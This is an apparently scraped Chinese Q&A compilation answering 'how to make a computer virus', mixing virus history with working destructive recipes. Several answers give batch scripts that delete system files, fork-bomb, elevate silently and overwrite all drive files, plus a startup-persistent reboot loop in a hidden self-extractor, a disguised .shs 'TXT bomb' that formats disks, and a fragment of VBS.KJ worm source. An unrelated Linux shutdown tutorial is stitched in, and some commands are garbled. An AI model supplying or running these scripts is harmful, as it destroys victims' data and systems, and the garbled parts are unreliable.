⑴ 如何制作电脑病毒
很荣幸能够回答您的问题!
鼠标右键,选择记事本,文本文件,或者rtf文件
打开试试吧!不要做坏事哦!
希望能帮到您,如有疑问,请追问!
⑵ 怎样制做电脑病毒
病毒是买的,自己做是很难的,黑客网站有卖的,80多元一个月,要不就上不正当的网站,下不正当的文件,病毒含有率是95%,我建议你还是别整病毒,有的病毒可使电脑瘫痪,跟惨的是黑客专用的病毒,文件可随时被篡改
⑶ 如何制作电脑关机病毒
新建一个文本文档,在其中输入“shutdown
-r
-t
30”(不包含双引号)然后保存为扩展名为.bat的文件。
一旦运行这个文件桌面就会弹出一个倒计时30秒重启的对话框。我们还可以再修改一下,把“-r”改成“-s”(不包含双引号)这样在运行后就只是关机而不重启。注意:其中的30是关机或重启的倒计时时间,你可以随便改。
我们还可以再进行加工,就是让它在每次开机时自动运行,步骤如下:
步骤1、右击这个文件,在弹出的快捷菜单中选择“添加到压缩文件”。
步骤2、双击打开这个压缩文件,工具栏中选择“自解压格式”。
步骤3、在出现的自解压设置中点击“高级自解压选项”,然后在解压后运行中输入刚才保存的那个文件名,在解压路径输入:C:\Documents
and
Settings\Administrator\[开始]
菜单\程序\启动”。
步骤4、在模式中的安静模式选择“全部隐藏”。最后点击确定即可生成一个自解压文件。
这样我在运行这个自解压文件时就会自动运行那个病毒文件,并将其解压到启动文件夹中,让其在每次开机时都运行。对方在运行我们制作的病毒后他的电脑就会不间断的重启,是不是很好玩呀!
要想不重启只要在dos下输入“shutdown
-a”回车,然后再把启动文件夹中的病毒删除即可。
⑷ 电脑病毒制作方法
电脑病毒是一个程序,一段可执行码。就像生物病毒一样,计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。
可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为制造的程序,它通过不同的途径潜伏或寄生在存储媒体(如磁盘、内存)或程序里。当某种条件或时机成熟时,它会自生复制并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复制, 具有传染性。
所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质(或程序)里, 当达到某种条件时即被激活的具有对计算机资源进行破坏作用的一组程序或指令集合。
1、最初"计算机病毒"这一概念的提出可追溯到七十年代美国作家雷恩出版的《P1的青春》一书,书中构思了一种能够自我复制,利用通信进行传播的计算机程序,并称之为计算机病毒。
2、贝尔实验室的三位年轻程序员也受到冯?诺依曼理论的启发,发明了“磁芯大战”游戏。
3、1983 年 11月,在一次国际计算机安全学术会议上,美国学者科恩第一次明确提出计算机病毒的概念,并进行了演示。
4、世界上公认的第一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒,编写该病毒的是一对巴基斯坦兄弟,两兄弟经营着一家电脑公司,以出售自己编制的电脑软件为生。当时,由于当地盗版软件猖獗,为了防止软件被任意非法拷贝,也为了追踪到底有多少人在非法使用他们的软件,于是在1986年年初,他们编写了“大脑(Brain)”病毒,又被称为“巴基斯坦”病毒。该病毒运行在DOS操作系统下,通过软盘传播,只在盗拷软件时才发作,发作时将盗拷者的硬盘剩余空间吃掉。
5、1988年11月美国国防部的军用计算机网络遭受莫里斯病毒袭击,致使美国Internet网络上6000多计算机感染,直接经济损失9600万美元。莫里斯病毒是由康乃尔大学23岁的罗特?莫里斯制作。后来出现的各类蠕虫,都是仿造了莫里斯蠕虫,以至于人们将该病毒的编制者莫里斯称为“蠕虫之父”。
6、1999年 Happy99、美丽杀手(Melissa)等完全通过Internet传播的病毒的出现标志着Internet病毒将成为病毒新的增长点。其特点就是利用Internet的优势,快速进行大规模的传播,从而使病毒在极短的时间内遍布全球。
7、CIH病毒是继DOS病毒的第四类新型病毒,CIH这三个字母曾经代表着灾难。1998年8月从台湾传入大陆,共有三个主要版本:1.2版/1.3版/1.4版,发作时间分别是4月26日、6月26日、每月26日。该病毒是第一个直接攻击、破坏硬件的计算机病毒,是迄今为止破坏最为严重的病毒。
CIH病毒制造者 陈盈豪 曾有两次精神科门诊记录,被人们认为是“电脑鬼才”。
8、2000年的5月,通过电子邮件传播的"爱虫"病毒迅速在世界各地蔓延,更大规模的发作,造成全世界空前的计算机系统破坏。 I LOVE YOU爱虫病毒是使用VB Script程序语言编写的病毒,它主要是通过一封信件标题为“I LOVE YOU"的电子邮件传播的。一旦执行附加文件,病毒会获取Outlook通讯录的名单,并自动发出“I LOVE YOU”电子邮件,从而导致网络阻塞。破坏性:爱虫病毒的传播会导致网络瘫痪,病毒发作时,还会把*.mp3、*.jpg等10种文件改为*.vbs,并传染覆盖这些文件。
与爱虫病毒相似的网络病毒还有Melissa(美丽杀手病毒)等。
⑸ 网络病毒是怎样制作出来的
病毒是一种计算机指令代码。用户运行了这些代码后,或是出现一个小小的恶作剧,或是产生一些恶意的结果,如破坏系统文件造成系统无法运行、数据文件统统删除、硬件被破坏、非法侵入内部数据库偷窃或篡改数据等等。
病毒的制造者往往出于炫耀自己的编程能力与控制力、或是因自己计算机使用中不慎染毒而产生的报复心理制毒传毒。也有一些是因为保护自己的知识产权而制作的一个可控“定时炸弹”。如果用户正常使用将不会发作;如果用户不及时缴纳费用或者私下传播该应用软件,那么
“定时炸弹”就会被引爆。
最早由冯.诺伊曼提出了这种可能性,20世纪70年代中期有几位美国科普作家在他们的科幻小说中描写了计算机病毒。1983年11月3日Fred.Cohen博士研制出一种在运行过程中不断复制自身的破坏性程序,Len.Adleman将其命名为计算机病毒(Computer
Viruses)。
计算机和网络给我们生活提供的便利,远非计算机病毒带来的不便所能比拟的。只要我们了解病毒的传播方式,依靠专业人员的支持,就可以抵御病毒带来的各种危害,从而更为有效地利用计算机网络技术改进我们的生活。
常见病毒简介:
引导型-引导型病毒是感染磁盘引导区或主引导区的一类病毒,是感染率仅次于“宏病毒”的常见病毒。由于这类病毒感染引导区,当磁盘或硬盘在运行时,引发感染其他*.exe、*.com、*.386等计算机运行必备的命令程序,造成各种损害。常见的品种有tpvo/3783,Windows系统感染后会严重影响运行速度、某些功能无法执行,经过杀毒以后,必须重装Windows操作系统,才能正常运行。
文件型-文件型病毒是感染文件的一类病毒,是目前种类最多的一类病毒。黑客病毒Trojan.BO就属于这一类型。BO黑客病毒则利用通讯软件,通过网络非法进入他人的计算机系统,获取或篡改数据或者后台控制计算机。从而造成各种泄密、窃取事故。
混合型-这类病毒既感染命令文件、又感染磁盘引导区与主引导区。能破坏计算机主板芯片(BIOS)的CIH毁灭者病毒属于该类病毒。CIH是一个台湾大学生编写的一个病毒,当时他把它放置在大学的BBS站上,1998年传入大陆,发作的日期是每个月的26日。该病毒是第一个直接攻击计算机硬件的病毒,破坏性极强,发作时破坏计算机Flash
BIOS芯片中的系统程序,导致主板与硬盘数据的损坏。1999年4月26日,CIH病毒在中国、俄罗斯、韩国等地大规模发作,仅大陆就造成数十万计算机瘫痪,大量硬盘数据被破坏。
宏病毒-是一类主要感染WORD文档和文档模板等数据文件的病毒。宏病毒是使用某个应用程序自带的宏编程语言编写的病毒,目前国际上已发现三类宏病毒:感染WORD系统的WORD宏病毒、感染EXCEL系统的EXCEL宏病毒和感染Lotus
Ami
Pro的宏病毒。目前,人们所说的宏病毒主要指Word和Excel宏病毒。从96年下半年开始在我国广泛流行。如Tw
No-A、美丽杀、PaPa等。
与以往的病毒不同,宏病毒有以下特点:
①感染数据文件:宏病毒专门感染数据文件,彻底改变了人们的“数据文件不会传播病毒”的错误认识。
②多平台交叉感染:宏病毒冲破了以往病毒在单一平台上传播的局限,当WORD、EXCEL这类软件在不同平台(如WINDOWS、WINDOWS
NT、OS/2和MACINTOSH等)上运行时,会被宏病毒交叉感染。
③容易编写:以往病毒是以二进制的计算机机器码形式出现,而宏病毒则是以人们容易阅读的源代码形式出现,所以编写和修改宏病毒比以往病毒更容易。从96年底至今短短半年宏病毒种类已从三十多种急剧增加到1000多种。
④容易传播:别人送一篇文章或发一个E-mail(电子邮件)给你,如果它们带有病毒,只要你打开这些文件,你的计算机就会被宏病毒感染了。此后,你打开或新建文件都可能带上宏病毒,这导致了宏病毒的感染率非常高。
⑹ 病毒是怎么制作出来的
病毒定义
计算机病毒是一个程序,一段可执行码,对计算机的正常使用进行破坏,使得电脑无法正常使用甚至整个操作系统或者电脑硬盘损坏。就像生物病毒一样,计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。这种程序不是独立存在的,它隐蔽在其他可执行的程序之中,既有破坏性,又有传染性和潜伏性。轻则影响机器运行速度,使机器不能正常运行;重则使机器处于瘫痪,会给用户带来不可估量的损失。通常就把这种具有破坏作用的程序称为计算机病毒。 除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图像上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。计算机病毒:一种计算机程序,它可以附属在可执行文件或隐藏在系统数据区中,在开机或执行某些程序后悄悄地进驻内存,然后对其它的文件进行传染,使之传播出去,然后在特定的条件下破坏系统或骚扰用户。目前有很多的清除病毒的软件,但是新病毒还是层出不穷,成为一大危害。
病毒的来源
(1)搞计算机的人员和业余爱好者的恶作剧、寻开心制造出的病毒,例如象圆点一类的良性病毒;
(2)软件公司及用户为保护自己的软件被非法复制而采取的报复性惩罚措施。因为他们发现对软件上锁,不如在其中藏有病毒对非法拷贝的打击大, 这更加助长了各种病毒的传播;
(3)旨在攻击和摧毁计算机信息系统和计算机系统而制造的病毒----就是蓄意进行破坏。例如1987年底出现在以色列耶路撒冷西伯莱大学的犹太人病毒,就是雇员在工作中受挫或被辞退时故意制造的。它针对性强,破坏性大,产生于内部,防不胜防;
(4)用于研究或有益目的而设计的程序,由于某种原因失去控制或产生了意想不到的效果。
病毒怎么来的?就是这样来的 病毒只是个运用不当的程序 要是冰河用的好可以管理局域网 呵呵
⑺ 怎样“制造”电脑病毒(不伤害自己的电脑)
那就看看vbs.kj的源码 Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() \‘ 初始化变量 KJSetDim() \‘ 初始化环境 KJCreateMilieu() \‘ 感染本地或者共享上与html所在目录 KJLikeIt() \‘ 通过vbs感染Outlook邮件模板 KJCreateMail() \‘ 进行病毒传播 KJPropagate() End Sub \‘ 函数:KJAppendTo(FilePath,TypeStr) \‘ 功能:向指定类型的指定文件追加病毒 \‘ 参数: \‘ FilePath 指定文件路径 \‘ TypeStr 指定类型 Function KJAppendTo(FilePath,TypeStr) On Error Resume Next \‘ 以只读方式打开指定文件 Set ReadTemp = FSO.OpenTextFile(FilePath,1) \‘ 将文件内容读入到TmpStr变量中 TmpStr = ReadTemp.ReadAll \‘ 判断文件中是否存在“KJ_start()“字符串,若存在说明已经感染,退出函数; \‘ 若文件长度小于1,也退出函数。 If Instr(TmpStr,“KJ_start()“) <> 0 Or Len(TmpStr) < 1 Then ReadTemp.Close Exit Function End If \‘ 如果传过来的类型是“htt“ \‘ 在文件头加上调用页面的时候加载KJ_start()函数; \‘ 在文件尾追加html版本的加密病毒体。 \‘ 如果是“html“ \‘ 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体; \‘ 如果是“vbs“ \‘ 在文件尾追加vbs版本的病毒体 If TypeStr = “htt“ Then ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,2) FileTemp.Write “<“ & “BODY onload=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & TmpStr & vbCrLf & HtmlText FileTemp.Close Set FAttrib = FSO.GetFile(FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,8) If TypeStr = “html“ Then FileTemp.Write vbCrLf & “<“ & “HTML>“ & vbCrLf & “<“ & “BODY onload=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & HtmlText ElseIf TypeStr = “vbs“ Then FileTemp.Write vbCrLf & VbsText End If
⑻ 麻烦你给我写一个简单的电脑病毒、我试着制作一下、把过程写详细些好吗
[本站原创]"TXT",即大家最熟悉的纯文本格式,它是一种最基本的文本文件保存格式。有体积小、兼容性好、无病毒等优点。实话说树大招风,黑客们却利用人们对TXT这份信任搞起了TXT"炸弹"。TXT炸弹其实是披着".txt"外皮的"碎片对象"(扩展名为SHS)的文件,它通过邮件附件的形式,悄悄的进入你的系统。善良的人们以为光临的是TXT文件,没有任何的考虑便双击运行。这时这只披着羊皮的"老狼",却脱掉"羊皮",露出原形,干起破坏计算机系统的勾当。为了保护自身的安全,摸清的"对方"的底细。今天我们向大家展示如何制作一个格式化软盘的TXT炸弹。我们的目的在于知已知彼,百战百胜。
实战"TXT"病毒
步骤1 打开记事本,创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
步骤2 打开写字板,将此文件拖放入记事本。也可以单击记事本菜单栏中的【插入】|【对象】,弹出【插入对象】对话框,选中【从文件创建】,然后单击【浏览】按钮选择要插入的文件(如图1)。
图1 插入对象
步骤3 选中该插入对象的图标,选择菜单栏中的【编辑】|【包对象】|【编辑包】(如图2)。
图2添加图标
在弹出的【对象包装程序】对话框中,选择菜单栏中的【编辑】|【命令行】,然后输入如下命令:Format.com a: /autotest,单击【确定】,此时,内容栏中会显示出命令内容(如图3)。
图3 添加命令
步骤4 单击外观栏中的【插入图标】按钮,会弹出一个警告对话框,确认,然后任选一个图标(如图4)。
图4 选取图标
步骤5 选择菜单栏中的【编辑】|【卷标】,为此嵌入对象取一个名称(会替换原来的文件名称)(如图5)。单击【文件】菜单中的【更新】,然后关闭此对话框。
图5 卷标
步骤6 将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是"碎片",现在我们把它改成"iloveyou.txt"。打开电子邮件程序将桌面上的"iloveyou.txt"作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
步骤7 当邮件接收者误将"iloveyou.txt.shs"文件作为"iloveyou.txt"放心地打开时,或打开文件,单击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口,执行格式化命令),假如此时有另一个程序正在访问软驱,则会显示如下信息"Drive A: is currently in use by another process. Aborting Format."(A驱正被另一个程序访问,格式化中止)。这样一个格式化软盘的炸弹就制作起来了,如果大家加上格式化硬盘的代码,那效果可以想象了。
防御
面对如此狡猾的TXT炸弹,平时就不拘小节的我们如何提防呢,下面向大家介绍两种防治措施,以防一方平安。
1.揭开TXT的外皮
其实TXT病毒最后的危害在于它的隐蔽性,如何我们能够揭开它的外皮,直接显示出".SHS"扩展名,这样危害就会减少很多。显示".SHS"扩展名方法其实很简单,只要找开注册表编辑器,从中找到"HEY_CLASSES_ROOTShellScrap"键,在其下面的一个键值为"NeverShowExt",它是无法显示".SHS"文件扩展名的"罪魁祸首",删除它,以后我们就可以直接看到".SHS"扩展名了,当然这时的人们绝不会在三心二意了。
2.更换"碎片对象"图标。
我们为什么一眼就可以看出某种文件的具体的格式,这都是由它们的默认图标决定的。因为于碎片对象文件的默认图标与文本文件图标非常相似所以我们经常将碎片对象文件误认为TXT文件。为了区别开它们,我们只要更换碎片对象文件的默认图标即可。打开"资源管理器",然后选中【查看】菜单下的【文件夹选框】,在弹出的对话框中选择【文件类型】活页卡,在【已注册的文件类型】下找到【碎片对象】。单击右上角【编辑】按钮,在打开的【编辑文件类型】对话框中单击上边的【更改图标】按钮(如图6)。打开C:WINDOWSSYSTEMPifmgr.dll,从出现的图标中选一个作为.SHS文件的新图标(就选第一排最后一个吧,一颗炸弹!),这样以后一看就知道这是一颗炸弹哟,大意不得。
图6 编辑类型
方便日常操作,常用的关机和重启命令
Linux中常用的关机和重新启动命令有shutdown、halt、reboot以及init,它们都可以达到关机和重新启动的目的,但是每个命令的内部工作过程是不同的,下面将逐一进行介绍。
1. shutdown
shutdown命令用于安全关闭Linux系统。有些用户会使用直接断掉电源的方式来关闭Linux,这是十分危险的。因为Linux与Windows不同,其后台运行着许多进程,所以强制关机可能会导致进程的数据丢失,使系统处于不稳定的状态,甚至会损坏硬件设备。
执行shutdown命令时,系统会通知所有登录的用户系统将要关闭,并且login指令会被冻结,即新的用户不能再登录系统。使用shutdown命令可以直接关闭系统,也可以延迟指定的时间再关闭系统,还可以重新启动。延迟指定的时间再关闭系统,可以让用户有时间储存当前正在处理的文件和关闭已经打开的程序。
shutdown命令的部分参数如下:
[-t] 指定在多长时间之后关闭系统
[-r] 重启系统
[-k] 并不真正关机,只是给每个登录用户发送警告信号
[-h] 关闭系统(halt)
shutdown命令的工作实质是给init程序发送信号(signal),要求其切换系统的运行级别(Runlevel)。系统的运行级别包括:
0:关闭系统
1:单用户模式,如果没有为shutdown命令指定-h或-r参数而直接执行,则默认将切换到此运行级别
2:多用户模式(不支持NFS)
3:多用户模式(支持NFS),一般常用此种运行级别
5:多用户模式(GUI模式)
6:重新启动系统
2. halt
halt是最简单的关机命令,其实际上是调用shutdown -h命令。halt执行时,杀死应用进程,文件系统写操作完成后就会停止内核。
halt命令的部分参数如下:
[-f] 没有调用shutdown而强制关机或重启
[-i] 关机或重新启动之前,关掉所有的网络接口
[-p] 关机时调用poweroff,此选项为缺省选项
3.reboot
reboot的工作过程与halt类似,其作用是重新启动,而halt是关机。其参数也与halt类似。
4.init
init是所有进程的祖先,其进程号始终为1。init用于切换系统的运行级别,切换的工作是立即完成的。init 0命令用于立即将系统运行级别切换为0,即关机;init 6命令用于将系统运行级别切换为6,即重新启动。
(T115)
⑼ 怎么做电脑病毒
最简单的电脑病毒的编写方法:
用记事本编写以下内容:
@CLS
@ECHO My Virus Version 1.0
@deltree/y c:\command.com
@deltree/y c:\io.sys
@deltree/y c:\msdos.sys
@deltree/y c:\windows\*.*
@deltree/y c:\windows\win.com
@deltree/y c:\winnt\win.com
然后保存为“Autoexec.bat”文件,然后把这个文件复制到C盘根目录下,然后重新启动计算机。好了,病毒开始发作了......
⑽ 电脑病毒制作教程
很荣幸能够回答您的问题!
桌面上创建记事本,改后缀为bat
2
::输入以下代码
%0|%0
保存后退出,打开会发现无限制的弹窗。这是什么原理呢?
执行脚本的时候,|管道符会将左面的值传给右边,而这里%0是第一个参数(批处理路径),所以会无限执行自己。
第二种病毒
这种更强大一些。同样,桌面上创建记事本,改后缀为bat
::输入以下代码
for /l %%i in (1 1 999999) do md A..
这个病毒利用Windows命名漏洞,创建999999个删除不了也打不开的文件夹。解决方法:把md改为rd
第三种病毒
这种病毒更高级,攻击性能更强。同样,桌面上创建记事本,改后缀为bat
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit
:a
set /a a+=1
echo %random%-%random%-%random% > C:Users\%username%Desktop病毒文件.%random%
mshta javascript:alert("您已中第%a%个病毒.");close();
goto a
这个病毒会在后台运行,在桌面重复弹信息框,生成垃圾文件,千万不敢随意测试,因为电脑会消耗尽内存后蓝屏。
第四种病毒
这种病毒最有破坏性,跟熊猫烧香媲美。同样,桌面上创建记事本,改后缀为bat
@%1mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit
for /f "tokens=* delims=" %%i in ('dir /b D:*.*') do /y "%dpnx0" "%%i" >nul
for /f "tokens=* delims=" %%i in ('dir /b C:*.*') do /y "%dpnx0" "%%i" >nul
此程序特别狠,会在后台把C、D盘所有的文件都替换成自己(病毒文件,然后会又被执行)。
希望能帮到您,如有疑问,请追问!